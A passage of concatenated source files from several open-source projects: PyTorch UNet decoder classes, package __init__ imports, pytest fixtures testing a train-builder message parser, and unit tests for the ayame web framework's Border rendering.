self.warp_deconv2 = deconv_activation(64, 64,activation = activation)
self.head_deconv1 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv1 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.post_fusion1 = conv_activation(64, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
h = self.head_deconv4(concat0)
h = self.body_deconv4(h) + LR_conv4
x = self.warp_deconv4(h)
concat1 = torch.cat((LR_conv3,warp_conv3),1)
h = self.head_deconv3(concat1)
h = self.body_deconv3(h) + x
x = self.warp_deconv3(h)
concat2 = torch.cat((LR_conv2,warp_conv2),1)
h = self.head_deconv2(concat2)
h = self.body_deconv2(h) + x
x = self.warp_deconv2(h)
concat3 = torch.cat((LR_conv1,warp_conv1),1)
h = self.head_deconv1(concat3)
h = self.body_deconv1(h) + x
post_fusion1 = self.post_fusion1(h)
final = self.final(post_fusion1)
return final
class UNet_decoder_weight(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init', n_blocks=1):
super(UNet_decoder_weight, self).__init__()
self.head_deconv4 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv4 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
self.head_deconv3 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv3 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(128, 64,activation = activation)
self.head_deconv2 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv2 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
#in_ch
self.warp_deconv2 = deconv_activation(128, 64,activation = activation)
self.head_deconv1 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv1 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.post_fusion1 = conv_activation(128, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
w = self.head_deconv4(concat0)
h = self.body_deconv4(w) * warp_conv4
x = torch.cat((h, LR_conv4),1)
x = self.warp_deconv4(x)
concat1 = torch.cat((LR_conv3,warp_conv3),1)
w = self.head_deconv3(concat1)
h = self.body_deconv3(w) * warp_conv3
x = torch.cat((x, h),1)
x = self.warp_deconv3(x)
concat2 = torch.cat((LR_conv2,warp_conv2),1)
w = self.head_deconv2(concat2)
h = self.body_deconv2(w) * warp_conv2
x = torch.cat((x, h),1)
x = self.warp_deconv2(x)
concat3 = torch.cat((LR_conv1,warp_conv1),1)
w = self.head_deconv1(concat3)
h = self.body_deconv1(w) * warp_conv1
x = torch.cat((x, h),1)
post_fusion1 = self.post_fusion1(x)
final = self.final(post_fusion1)
return final
class UNet_decoder_weight_2(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init', n_blocks=1):
super(UNet_decoder_weight_2, self).__init__()
self.head_deconv4 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv4 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.warp_deconv4 = deconv_activation(128, 64,activation = activation)
self.head_deconv3 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv3 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(192, 64,activation = activation)
self.head_deconv2 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv2 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
#in_ch
self.warp_deconv2 = deconv_activation(192, 64,activation = activation)
self.head_deconv1 = nn.Sequential(
nn.Conv2d(128, 64,kernel_size=3, stride=1, padding=1),
nn.LeakyReLU(0.1, True),
)
self.body_deconv1 = nn.Sequential(
*[ResBlock(64) for _ in range(n_blocks)],
)
self.post_fusion1 = conv_activation(192, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,LR_conv1, LR_conv2, LR_conv3, LR_conv4, warp_conv1, warp_conv2, warp_conv3, warp_conv4):
concat0 = torch.cat((LR_conv4,warp_conv4),1)
w = self.head_deconv4(concat0)
h = self.body_deconv4(w) * warp_conv4
x = torch.cat((h, LR_conv4),1)
x = self.warp_deconv4(x)
concat1 = torch.cat((LR_conv3,warp_conv3),1)
w = self.head_deconv3(concat1)
h = self.body_deconv3(w) * warp_conv3
x = torch.cat((x, h, LR_conv3),1)
x = self.warp_deconv3(x)
concat2 = torch.cat((LR_conv2,warp_conv2),1)
w = self.head_deconv2(concat2)
h = self.body_deconv2(w) * warp_conv2
x = torch.cat((x, h, LR_conv2),1)
x = self.warp_deconv2(x)
concat3 = torch.cat((LR_conv1,warp_conv1),1)
w = self.head_deconv1(concat3)
h = self.body_deconv1(w) * warp_conv1
x = torch.cat((x, h, LR_conv1),1)
post_fusion1 = self.post_fusion1(x)
final = self.final(post_fusion1)
return final
class UNet_decoder_VAE(nn.Module):
def __init__(self, activation = 'selu' , init_type = 'w_init'):
super(UNet_decoder_VAE, self).__init__()
self.warp_deconv4 = deconv_activation(64, 64,activation = activation)
# in_ch = 64 + 64 +64
self.warp_deconv3 = deconv_activation(128, 64,activation = activation)
#in_ch
self.warp_deconv2 = deconv_activation(128, 64,activation = activation)
self.post_fusion1 = conv_activation(128, 64, kernel_size = 5, stride = 1, padding = 2,activation = activation,init_type = init_type)
self.final = conv_activation(64, 3, kernel_size = 5,stride = 1, padding = 2,activation = 'linear', init_type = init_type)
def forward(self,Ref_conv1, Ref_conv2, Ref_conv3, Ref_conv4):
x = self.warp_deconv4(Ref_conv4)
x = torch.cat((x,Ref_conv3),1)
x = self.warp_deconv3(x)
x = torch.cat((x,Ref_conv2),1)
x = self.warp_deconv2(x)
x = torch.cat((x,Ref_conv1),1)
post_fusion1 = self.post_fusion1(x)
final = self.final(post_fusion1)
return final
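The `torch.cat` channel arithmetic in the two decoders above can be sanity-checked without instantiating any PyTorch modules. A minimal sketch, under the assumption (implied by the constructor arguments, not stated in the file) that every encoder skip feature (`LR_conv*`, `warp_conv*`, `Ref_conv*`) carries 64 channels:

```python
# Sanity-check of the skip-connection channel bookkeeping, no PyTorch needed.

def cat_channels(*parts):
    """torch.cat(..., dim=1) concatenates along channels, so counts add."""
    return sum(parts)

# First decoder: post_fusion1 sees cat(x, h, LR_conv1) = 64 + 64 + 64
assert cat_channels(64, 64, 64) == 192  # matches post_fusion1(192, 64, ...)
# UNet_decoder_VAE: each stage sees cat(deconv_out, Ref_conv*) = 64 + 64
assert cat_channels(64, 64) == 128      # matches warp_deconv3/2 and post_fusion1(128, ...)
```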
# File: BlackBox_Python/__init__.py (UBC-MDS/BlackBox_Python, MIT)
from BlackBox_Python.ci import getCredibleInterval, getConfidenceInterval
from BlackBox_Python.ABtests import performABtest_Freq
from BlackBox_Python.MapVMle import getMLE
# File: goldsberry/league/__init__.py (Reid1923/py-GoldsberryTest, MIT)
from goldsberry.league._League import *
from goldsberry.league import _Draft as draft
from goldsberry.league import _PlayType as playtype
from goldsberry.league import _SportVu as sportvu
# File: tests/test_messages.py (PHT-Medic/central-train-builder, MIT)
import json
import pytest
from builder.messages import BuildMessage
@pytest.fixture
def build_message():
return {
"id": "f54f58d9-58a1-4141-9dfb-a48b2a275998",
"type": "trainBuildStart",
"metadata": {},
"data": {
"user_id": 5,
"user_rsa_secret_id": "test-rsa",
"userPaillierSecretId": "test-paillier",
"id": "da8fd868-0fed-42e3-b6d8-5abbf0864d4a",
"proposal_id": 4,
"stations": [
{
"id": "test-station",
"ecosystem": "tue",
"index": 1
}
],
"files": [
"test_train/entrypoint.py",
"test_train/requirements.txt"
],
"master_image": "python/slim",
"entrypointExecutable": "python",
"entrypoint_path": "test_train/entrypoint.py",
"session_id": "8203c4facff907d3bd83f8399e9a97aa4270e27acb4369f5bcdaab20643f2dc7c2ca8fe78a576c3ae7ac56b64d89a778aa86f7f90360734965dce0264ddcd705",
"hash": "91416369e845e7ff12efe8514736d468b71bfc15cc5ded92399a1a558f4317da68cfd5884cb9e5bbbac15ce45731afe4e47ced256c7a2e493ff7fad5481b8d31",
"hash_signed": "ace71ecae217b8da4426cee8ba8abeddab6d1d9c9d073e7c54197b82a1d453189ca2a3e278be7747b4e0fac28bba32dc1b5a4dbc4b060a2f5e659180367b56b90b6ee8f59f529206e39645acd0bd24c03c3ef291ac8ad91dbf4390541033656ec3ee48a516a94348cb60ed596be305c3754e7e4b66dc433bb47a2483ea7d772cc6a353bb43b82e4f35f7dc6ee1f502765d64785ea816b20eed6c3a1ea857a753d5048e16d395d3479b62d91c9870d9f19ee0740b6051a3089e5350227820281406d267e188ac4edb1f0f3ebd36a0aa6cb2eeeaaa71023b0e8e6381d3bc683277208a7c91de77d61e4a8ca8f71621449e564f57bb8eaef25f08da61e8b0b79f61",
"user_he_key": "12345241",
"entrypoint_command": "run"
}
}
@pytest.fixture
def build_message_query():
return {
"id": "f54f58d9-58a1-4141-9dfb-a48b2a275998",
"type": "trainBuildStart",
"metadata": {},
"data": {
"user_id": 5,
"user_rsa_secret_id": "test-rsa",
"userPaillierSecretId": "test-paillier",
"id": "da8fd868-0fed-42e3-b6d8-5abbf0864d4a",
"proposal_id": 4,
"stations": [
{
"id": "test-station",
"ecosystem": "tue",
"index": 1
}
],
"files": [
"test_train/entrypoint.py",
"test_train/requirements.txt"
],
"master_image": "python/slim",
"entrypointExecutable": "python",
"entrypoint_path": "test_train/entrypoint.py",
"session_id": "8203c4facff907d3bd83f8399e9a97aa4270e27acb4369f5bcdaab20643f2dc7c2ca8fe78a576c3ae7ac56b64d89a778aa86f7f90360734965dce0264ddcd705",
"hash": "91416369e845e7ff12efe8514736d468b71bfc15cc5ded92399a1a558f4317da68cfd5884cb9e5bbbac15ce45731afe4e47ced256c7a2e493ff7fad5481b8d31",
"hash_signed": "ace71ecae217b8da4426cee8ba8abeddab6d1d9c9d073e7c54197b82a1d453189ca2a3e278be7747b4e0fac28bba32dc1b5a4dbc4b060a2f5e659180367b56b90b6ee8f59f529206e39645acd0bd24c03c3ef291ac8ad91dbf4390541033656ec3ee48a516a94348cb60ed596be305c3754e7e4b66dc433bb47a2483ea7d772cc6a353bb43b82e4f35f7dc6ee1f502765d64785ea816b20eed6c3a1ea857a753d5048e16d395d3479b62d91c9870d9f19ee0740b6051a3089e5350227820281406d267e188ac4edb1f0f3ebd36a0aa6cb2eeeaaa71023b0e8e6381d3bc683277208a7c91de77d61e4a8ca8f71621449e564f57bb8eaef25f08da61e8b0b79f61",
"query": {
"query": "/Patient?",
"data": {
"output_format": "json",
"filename": "patients.json",
}
},
"user_he_key": "12345241",
"entrypoint_command": "run"
}
}
@pytest.fixture
def status_message():
return {
"type": "trainStatus",
"data": {
"userId": 5,
"id": "test-train-1"
},
"metadata": {
}
}
def test_build_message_from_json(build_message, build_message_query):
build_hash = build_message["data"]["hash"]
message = BuildMessage(**build_message["data"])
assert isinstance(message, BuildMessage)
assert message
assert message.hash == build_hash
message = BuildMessage.parse_raw(json.dumps(build_message["data"]))
assert message
assert message.hash == build_hash
message = BuildMessage.parse_raw(json.dumps(build_message["data"]).encode("utf-8"))
assert message
assert message.hash == build_hash
with pytest.raises(ValueError):
message = BuildMessage.parse_raw(1)
query_message = BuildMessage(**build_message_query["data"])
assert query_message
query_message2 = BuildMessage.parse_raw(json.dumps(build_message_query["data"]).encode("utf-8"))
assert query_message == query_message2
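The test above exercises a pydantic-style `parse_raw` that accepts `str` or UTF-8 `bytes` and rejects anything else with `ValueError`. A minimal hypothetical stand-in illustrating that contract (`MiniMessage` is not part of the builder package; the real `BuildMessage` is assumed to be a pydantic model):

```python
import json

class MiniMessage:
    """Hypothetical stand-in for the BuildMessage parse contract tested above."""

    def __init__(self, **data):
        self.__dict__.update(data)

    def __eq__(self, other):
        return isinstance(other, MiniMessage) and self.__dict__ == other.__dict__

    @classmethod
    def parse_raw(cls, raw):
        # Accept str or UTF-8 bytes; anything else raises ValueError,
        # mirroring the pytest.raises(ValueError) check above.
        if isinstance(raw, bytes):
            raw = raw.decode("utf-8")
        if not isinstance(raw, str):
            raise ValueError(f"cannot parse {type(raw).__name__}")
        return cls(**json.loads(raw))
```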
# File: miso/modules/span_extractors/__init__.py (pitrack/arglinking, Apache-2.0)
from miso.modules.span_extractors.endpoint_span_extractor import EndpointSpanExtractor
from miso.modules.span_extractors.self_attentive_span_extractor import SelfAttentiveSpanExtractor
# File: tests/test_border.py (hattya/ayame, MIT)
#
# test_border
#
# Copyright (c) 2011-2021 Akinori Hattori <hattya@gmail.com>
#
# SPDX-License-Identifier: MIT
#
import textwrap
import ayame
from ayame import basic, border, form, http, markup
from base import AyameTestCase
class BorderTestCase(AyameTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.app.config['ayame.markup.pretty'] = True
def test_border(self):
class Spam(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(SpamBorder('border'))
class SpamBorder(Border):
pass
with self.application():
mc = Spam('a')
self.assertTrue(mc.find('border').render_body_only)
self.assertTrue(mc.find('border').has_markup)
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 8)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
self.assertWS(head, 5)
self.assertWS(head, 7)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Spam'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Spam',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[6]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'SpamBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 15)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
self.assertWS(body, 8)
self.assertWS(body, 9)
self.assertWS(body, 11)
self.assertWS(body, 12)
self.assertWS(body, 14)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Spam)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before ayame:body (SpamBorder)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(len(p), 3)
p.normalize()
self.assertEqual(p.children, ['inside border (SpamBorder)'])
p = body[10]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after ayame:body (SpamBorder)'])
p = body[13]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Spam)'])
def test_border_with_markup_inheritance(self):
class Eggs(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(HamBorder('border'))
class EggsBorder(Border):
pass
class HamBorder(EggsBorder):
pass
with self.application():
mc = Eggs('a')
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 11)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
self.assertWS(head, 5)
self.assertWS(head, 7)
self.assertWS(head, 8)
self.assertWS(head, 10)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Eggs'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Eggs',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[6]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'EggsBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[9]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'HamBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 15)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
self.assertWS(body, 8)
self.assertWS(body, 9)
self.assertWS(body, 11)
self.assertWS(body, 12)
self.assertWS(body, 14)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Eggs)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before ayame:body (HamBorder)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(len(p), 3)
p.normalize()
self.assertEqual(p.children, ['inside border (HamBorder)'])
p = body[10]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after ayame:body (HamBorder)'])
p = body[13]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Eggs)'])
def test_invalid_markup_no_ayame_border(self):
class Toast(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(ToastBorder('border'))
class ToastBorder(Border):
pass
with self.application():
mc = Toast('a')
with self.assertRaisesRegex(ayame.RenderingError, r"'ayame:border' .* not found\b"):
mc.render()
def test_invalid_markup_no_ayame_body(self):
class Beans(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(BeansBorder('border'))
class BeansBorder(Border):
pass
with self.application():
mc = Beans('a')
with self.assertRaisesRegex(ayame.RenderingError, r"'ayame:body' .* not found\b"):
mc.render()
def test_invalid_markup_unknown_ayame_element(self):
class Bacon(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(BaconBorder('border'))
class BaconBorder(Border):
pass
with self.application():
mc = Bacon('a')
with self.assertRaisesRegex(ayame.RenderingError, r"\bunknown .* 'ayame:bacon'"):
mc.render()
def test_empty_markup(self):
class Sausage(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(SausageBorder('border'))
class SausageBorder(Border):
pass
with self.application():
mc = Sausage('a')
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 5)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Sausage'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Sausage',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 9)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
self.assertWS(body, 8)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Sausage)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['inside border (Sausage)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Sausage)'])
def test_duplicate_ayame_elements(self):
class Lobster(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(LobsterBorder('border'))
class LobsterBorder(Border):
pass
with self.application():
mc = Lobster('a')
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 8)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
self.assertWS(head, 5)
self.assertWS(head, 7)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Lobster'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Lobster',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[6]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'LobsterBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 17)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
self.assertWS(body, 8)
self.assertWS(body, 9)
self.assertWS(body, 11)
self.assertWS(body, 13)
self.assertWS(body, 14)
self.assertWS(body, 16)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Lobster)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before ayame:body (LobsterBorder)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(len(p), 3)
p.normalize()
self.assertEqual(p.children, ['inside border (LobsterBorder)'])
ayame_body = body[10]
self.assertEqual(ayame_body.qname, self.ayame_of('body'))
self.assertEqual(ayame_body.attrib, {})
self.assertEqual(ayame_body.type, markup.Element.EMPTY)
self.assertEqual(ayame_body.ns, {})
self.assertEqual(ayame_body.children, [])
p = body[12]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after ayame:body (LobsterBorder)'])
p = body[15]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Lobster)'])
def test_feedback_field_border(self):
with self.application(self.new_environ()):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=False)
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_feedback_field_border_valid(self):
query = ('{path}=form&'
'field:field_body:text=text')
with self.application(self.new_environ(query=query)):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=False)
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_feedback_field_border_invalid(self):
query = ('{path}=form&'
'field:field_body:text=')
with self.application(self.new_environ(query=query)):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=True)
self.assertEqual(status, http.OK.status)
